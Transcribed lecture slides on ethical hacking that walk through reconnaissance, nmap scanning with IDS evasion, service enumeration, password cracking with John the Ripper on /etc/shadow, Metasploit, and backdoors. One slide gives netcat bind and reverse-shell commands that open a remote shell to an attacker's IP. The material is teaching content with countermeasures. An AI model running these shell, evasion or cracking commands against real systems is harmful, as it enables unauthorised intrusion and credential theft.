dr. igor santos. ¿what is ethical hacking? phases information gathering network mapping &...
TRANSCRIPT
![Page 1: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/1.jpg)
Dr. Igor Santos
Security of Information Systems
Ethical hacking
![Page 2: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/2.jpg)
2
Contents
¿What is Ethical Hacking? Phases
Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration Vulnerabilities Identification &
Exploitation
![Page 3: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/3.jpg)
3
¿What is Ethical Hacking?
![Page 4: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/4.jpg)
4
Ethical Hacking
A method to evaluate the security of a system or a network of systems by simulating an intruder attack
It shows the actual impact of a vulnerability through controled tests
It searchs for unknown vulnerabilities
![Page 5: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/5.jpg)
5
Ethical Hacking
Information level White Box Black Box
¿Social Engineering?
¿Physical Security?
¿Dangerous Tests? Exploits DoS …
![Page 6: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/6.jpg)
6
Information Gathering
![Page 7: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/7.jpg)
7
Information Gathering
Gather information about the target before the attack Without (too much) contact As much information as possible The information can be very valuable in
the future
More information = More probability of success in the attack
![Page 8: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/8.jpg)
8
Information Gathering
Information we search for: Names and/or Positions of workers E-mail addresses User names Public Addresses, Domains or URLs Used Software and Technologies Internal addresses or URLs Internal PATHs Data about the system configuration
![Page 9: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/9.jpg)
9
Information Gathering
Client and supplier names Physical Location Telephone Number …
Iterative process When information is found, new
searches are performed
![Page 10: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/10.jpg)
10
Information Gathering
Sources Search Engines DNS servers Whois servers Metadata Social Networks P2P networks …
![Page 11: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/11.jpg)
11
Information Gathering Types
Passive Methods The target is not contacted directly ▪ Search Engines▪ Whois▪ …
Active Methods It leaves some trace in the target▪ DNS zone transfer▪ Web site Mirroring▪ …
![Page 12: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/12.jpg)
12
Information Gathering Techniques
Internet Service Registration (whois) Information about IP record and
maintenance
Search Engines Gather public information from
company and workers web sites
![Page 13: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/13.jpg)
13
Information Gathering Techniques
DNS queries Identification of hosts by DNS querying
Web site analysis Intentionally published information, that
may suppose a risk for the security
![Page 14: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/14.jpg)
14
Information Gathering Techniques
New sources!!! Social Networks Metadata P2P networks Work searching websites
![Page 15: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/15.jpg)
15
Search Engines - Google
Google Hacking: Search in Google sensitive information, usually with malicious goals
Johnny Long Google Hacking For Penetration Testers http://www.hackersforcharity.org/ghdb/▪ No mantenida
http://www.exploit-db.com/google-dorks/▪ Continuación!!! (9 nov. 2010)
Cheat-sheet
http://www.sans.org/mentor/GoogleCheatSheet.pdf
![Page 16: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/16.jpg)
16
Search Engines - Google
¿What to look for? Vulnerable applications (e.g.,:
inurl:eStore/index.cgi?) Error Messages (e.g.,: “Warning:
mysql_query()” “invalid query”) Files with sensitive information (e.g.,:
filetype:sql “insert into”) Websites with private reports (e.g.,:
intitle:”Nessus Scan Report”) Web server versions (e.g.,: “Microsoft-IIS/*
server at”, intitle:index.of)
![Page 17: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/17.jpg)
17
Search Engines - Shodan
http://www.shodanhq.com/ A “diferent” search engine If finds systems by performing searches
based on the banner responses▪ Computer search engine
Filters: http://www.shodanhq.com/help/filters
Examples:▪ net:130.206.139.0/24▪ port:22 country:ES
![Page 18: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/18.jpg)
18
Search Engines - Netcraft
Netcraft (http://news.netcraft.com) It shows the following domain
information given a domain▪ OS version. ▪ Web server version▪ Uptime
![Page 19: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/19.jpg)
19
Search Engines
Countermeasures To properly configure the “robots.txt” file▪ This file indicates to search engines what the
must NOT index Periodically audit the web site with these
techniques in order to check that there is no access to sensitive information
![Page 20: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/20.jpg)
20
Social Networks
¿Who does have a profile in Facebook or LinkedIn?
¿Do we know how to handle privacity in social networks?
Social Engineering Create a fake profile in order to obtain access
to private profiles = ¡Lot of information!
Social Network Search Engines▪ http://www.123people.com/▪ http://www.pipl.com/
![Page 21: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/21.jpg)
21
Social Networks
Countermeasures Limit the presence in social networks Don’t publish too much Don’t publish automatically Don’t accept every friendship request
(we may not be the final victim but an attack vector)
![Page 22: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/22.jpg)
22
Metadata
Hidden information regarding a document Author Used Application Date of Creation Camera Model (images) E-mail Addresses …
They enhance the information present in a document
![Page 23: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/23.jpg)
23
Metadata - FOCA
A tool that started by being a metadata extractor and analyzer, now is more than that: Document panel: Searches several types of
documents in Google, Bing and Exaled DNS Search Panel : It uses different
techniques to obtain more domain namesCountermeasures: Metashield
Protector It cleans the metadata from documents
![Page 24: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/24.jpg)
24
Network Mapping & Scanning
![Page 25: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/25.jpg)
25
Network Mapping & Scanning
Several techniques Host discovery Port scanning IDS (Intrusion Detection System) evasion Service and OS identification
(fingerprinting)
![Page 26: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/26.jpg)
26
Network Mapping & ScanningNmap
Tool for network exploration and security auditing
nmap [ <Scan Type> .][<Options> ] { <target specificication> }
Options▪ Scan type: -sS, -sX, -sU, …▪ -p <ports>: ports to scan (separated by a comma
or “-” for range) (to scan all of them –p 0-65535)
![Page 27: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/27.jpg)
27
Network Mapping & Scanning
Zenmap Front-end for nmap It draws a network map with the results Predefined scans
![Page 28: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/28.jpg)
28
Network Mapping & Scanning
Manualhttp://nmap.org/man/es/man-briefoptions.html
Cheat sheethttp://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Bookhttp://nmap.org/book/
![Page 29: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/29.jpg)
29
Host Discovery
Identify online systems First step for network mapping
Classic method using ping ICMP echo request Alive systems respond to ICMP echo reply
It is also possible to send TCP packets and wait for the response of the online
ARP Ping in local networks
![Page 30: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/30.jpg)
30
Host Discovery
Nmap ping (-sP) ICMP echo request & ICMP timestamp
request TCP ACK packet port 80 TCP SYN packet port 443
Example:nmap –sP 192.168.1.1
![Page 31: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/31.jpg)
31
Port Scanning
One of the most widespread hacking techniques Nmap en Hollywood
http://nmap.org/movies.html
A computer executes several services that listen in tcp/udp ports
By means of scanning, we can locate open ports
![Page 32: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/32.jpg)
32
TCP Port Scanning - TCP Connect scan
TCP Connect scan A TCP connection is established with
the destination port (Three-Way Handshake)
A very reliable method to determine the port state
Simple and easy to detect▪ Generates too much noise
nmap –sT <IP> -p <ports>
![Page 33: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/33.jpg)
33
TCP Port Scanning - TCP Connect scan
Open port
![Page 34: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/34.jpg)
34
TCP Port Scanning - TCP Connect scan
Closed port
![Page 35: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/35.jpg)
35
TCP Port Scanning - TCP Connect scan
Filtered port
![Page 36: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/36.jpg)
36
TCP Port Scanning - SYN Scan
SYN scan If a port listening is found, the full
connection is not established▪ A RST is sent to finalize it
Because Three-Way Handshake is not completed, a lot of system don’t log the connection attempt
A IDS can easily detect it Quick and realiable
nmap –sS <IP> -p <ports>
![Page 37: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/37.jpg)
37
TCP Port Scanning - SYN Scan
Open port
![Page 38: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/38.jpg)
38
TCP Port Scanning - SYN Scan
Closed port
![Page 39: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/39.jpg)
39
TCP Port Scanning - SYN Scan
Filtered port
![Page 40: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/40.jpg)
40
UDP Port Scanning
UDP is a protocal not connection oriented Closed ports return the packet “ICMP
destination unreachable”
If the ICMP traffic is filtered the responsed are not retrieved for the closed ports The port state cannot be determined
conclusively
nmap –sU <IP> -p <ports>
![Page 41: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/41.jpg)
41
UDP Port Scanning
Open/Filtered port
![Page 42: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/42.jpg)
42
UDP Port Scanning
Closed port
![Page 43: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/43.jpg)
43
IDS evasion
Techniques to avoid IDS/IPS Use of fragmented packets▪ Distribution of an IP packet between various
data blocksnmap -sS -f <IP> -p <ports>
Spoofing of origin IPs to emulate multiple attackers▪ Hiding our own IP (attacker)nmap –sS –D <IP1,IP2,…IPN> <attacked_IP> -p <ports>
![Page 44: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/44.jpg)
44
Fingerprinting
Service Fingerprinting Identification of the service listening
in a port TCP/UDPnmap –sV <IP> -p <port>
O.S. Fingerprinting Identification of the Operative
Systemnmap –O <IP>
![Page 45: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/45.jpg)
45
Contramedidas escaneo de red
Disable unnecessary services Close ports
Firewall / IDS / IPS ICMP traffic filtering
![Page 46: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/46.jpg)
46
Enumeration
![Page 47: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/47.jpg)
47
Enumeration
Get information through a network service
What information? System user names Email addresses other systems ...
![Page 48: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/48.jpg)
48
Enumeration
Services FTP: anonymous / Ftp-user-enum TFTP: ¡without authentication! SMTP: VRFY y EXPN commands → smtpenum DNS: Direct/Reverse Lookup y zone transfer HTTP: banner grabbing RPC: edump, rpcdump, rpcinfo NETBIOS: samrdump SNMP: snmpwalk, snmpheck LDAP: Brute force by means of the Guest user
![Page 49: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/49.jpg)
49
Countermeasures - enumeration
Maintain the services updated Disable unnecessary services
![Page 50: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/50.jpg)
50
ATAQUES A CONTRASEÑAS
Passwords Attacks
![Page 51: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/51.jpg)
51
Password Guessing
It is unknown some or all the necessary data to authenticate User (if the Information Gathering phase
has been correctly done, we will have several system users)
Password The password file is known, but it is
encrypted Words are test until the correct one is
found
![Page 52: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/52.jpg)
52
Password Guessing
Systems store a password Hash They do not store clear users'
passwords One-way encryption function It cannot be decrypted▪ http://en.wikipedia.org/wiki/Cryptographic_ha
sh_function
![Page 53: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/53.jpg)
53
Password Guessing
During a pentest we will collect password hashes Bad configurations Successful intrusion
With administrative permission is possible to dump the hashes of the passwords of system users Windows -> SAM Unix -> / etc / passwd, / etc / shadow
![Page 54: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/54.jpg)
54
Attack Types
Dictionary It is based on a list of user names or
passwords Common Words Terms related to the audited Try until the right one is found It should be on the list! Success depends on how good and / or
extensive is the dictionary / pentest / passwords / wordlists
![Page 55: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/55.jpg)
55
Attack Types
Hybrid It uses a dictionary, but variations are
also introduced Examples Try dictionary words in lowercase and
uppercase A is changed by 4, S by 5, E by 3, ...
![Page 56: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/56.jpg)
56
Attack Types
Brute Force Usernames or passwords are generated
within a rank and given a character set▪ Eg max 8 characters [A-Za-z]
![Page 57: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/57.jpg)
57
John the Ripper
Password cracking tool Able to break several algorithms
DES MD5 SHA-1 LM (Lan Manager) ...
You can save a session for later cracking
![Page 58: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/58.jpg)
58
John the Ripper
Single mode Quick test Difficult to have success It uses typical passwords and some
variations
john --single <password_file>
![Page 59: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/59.jpg)
59
John the Ripper
Wordlist Mode It tests with a dictionary file Quick Hybrid attack: --rulesjohn --wordlist=<dictionary> <password_file>
Dictionaries/pentest/passwords/wordlists/
![Page 60: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/60.jpg)
60
John the Ripper
Incremental Mode It tries all possible combinations of
passwords (Brute Force)▪ Only letters (--incremental:alpha)▪ Only numbers (--incremental:digits)▪ Letters, numbers and some special characters (--incremental:lanman)▪ All characters (--incremental:all)
john --incremental:[mode] <password_file>
![Page 61: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/61.jpg)
61
John the Ripper
Show cracked hashes john --show /etc/shadow
![Page 62: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/62.jpg)
62
Other techniques
Shoulder surffing Social Engineering Sniffing
Capture the session logins Physical access
Bypass -> konboot Password cracking 0phcrack live cd (Rainbow
Tables)
![Page 63: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/63.jpg)
63
Vulnerabilities Identification & Exploitation
![Page 64: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/64.jpg)
64
Vulnerabilities Identification & Exploitation
Terminology Vulnerability Exploit (client-side, server-side, …) 0-day exploit Payload CVE (Common Vulnerabilities and
Exposures): http://cve.mitre.org/
![Page 65: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/65.jpg)
65
Lots of vulnerabilities types: Configuration (not design) Input validation Directory Jump Command Injection SQL Injection Cross-site scripting (XSS) Buffer overflow …
Vulnerabilities Identification & Exploitation
![Page 66: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/66.jpg)
66
Vulnerability Search Security Focus▪ http://www.securityfocus.com/vulnerabilities
National Vulnerability Database▪ http://web.nvd.nist.gov/view/vuln/search
CERT▪ http://cert.inteco.es/vulnSearch/Current_News/
Vulnerabilities_1/vulnerability_search/?postAction=getVulns
Microsoft Security Bulletins▪ http://www.microsoft.com/spain/technet/securi
ty/bulletin/ms10-oct.mspx Scanners: Secunia, Nessus, etc.
Vulnerabilities Identification & Exploitation
![Page 67: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/67.jpg)
67
Exploits Search Exploit Database▪ Milw0rm continuation.▪ http://www.exploit-db.com/
Others▪ http://www.securiteam.com/exploits▪ http://securityvulns.com/exploits▪ http://www.web-hack.ru/exploit▪ http://tarantula.by.ru/localroot
Vulnerabilities Identification & Exploitation
![Page 68: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/68.jpg)
68
Metasploit Framework for vulnerbility explotation It help in the development of new
exploits It allows to define▪ What exploit is going to be used▪ Which payload is going to be launched
lanzará▪ Meterpreter: advanced payload without disk access
(DLL Injection) → less forensics evidences.
▪ How is going to be coded (avoiding IDS, etc.)
Vulnerabilities Identification & Exploitation
![Page 69: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/69.jpg)
69
Mantaining the access– Backdoors Tiny Shell: Unix backdoor Hydrogen: backdoor from
Immunitysec▪ It includes robust encryption and traffic
hiding Radmin: Windows backdoor▪ A remote desktop like connection. Very
easy to use and with a lot of functions
Vulnerabilities Identification & Exploitation
![Page 70: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/70.jpg)
70
Netcat: it can be used as backdoor▪Victim (server): nc -lp 4444 –e cmd.exe▪Attacker (client): nc –vv <IP victim> 4444
▪ Also “reverse shell”:▪Attacker (client): nc –vvlp 4444▪Victim (server): nc –vv <IP attacker> 4444 –e cmd.exe
Vulnerabilities Identification & Exploitation
![Page 71: Dr. Igor Santos. ¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration](https://reader035.vdocument.in/reader035/viewer/2022062421/56649cae5503460f94971a26/html5/thumbnails/71.jpg)
71
References
Images RTVE http://www.flickr.com/photos/anonymous9000/26
63311366 The Matrix, Warner Bros. http://www.flickr.com/photos/venosdale/4412225
367 http://www.flickr.com/photos/melancon/22837190
35